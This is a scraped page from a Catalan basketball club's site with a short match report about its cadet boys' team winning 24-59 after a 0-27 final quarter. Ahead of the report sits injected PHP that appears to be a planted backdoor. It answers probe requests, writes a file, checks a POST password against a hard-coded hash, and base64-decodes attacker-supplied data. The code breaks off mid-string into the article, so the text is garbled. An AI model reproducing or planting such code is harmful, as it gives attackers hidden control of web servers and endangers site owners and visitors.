function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet masculí lila guanya el cuer després de fer un parcial de 0-27 en l'últim quart (24-59) - Tgn Bàsquet Club -

El cadet masculí lila guanya el cuer després de fer un parcial de 0-27 en l’últim quart (24-59)

Updated: maig 16, 2017

El cadet masculí lila va patir més del previst per vèncer el cuer de la lliga, el Rocabruna Reus Deportiu. El conjunt lila no va fer el seu millor partit i va cometre moltes errades, així com badades defensives. Amb tot, en els últims deu minuts del partit, el TGN Bàsquet va començar a circular millor la pilota, defensar amb més intensitat, dominar el rebot i córrer el contraatac, cosa que va provocar un increïble parcial de 0-27 que va sentenciar el matx.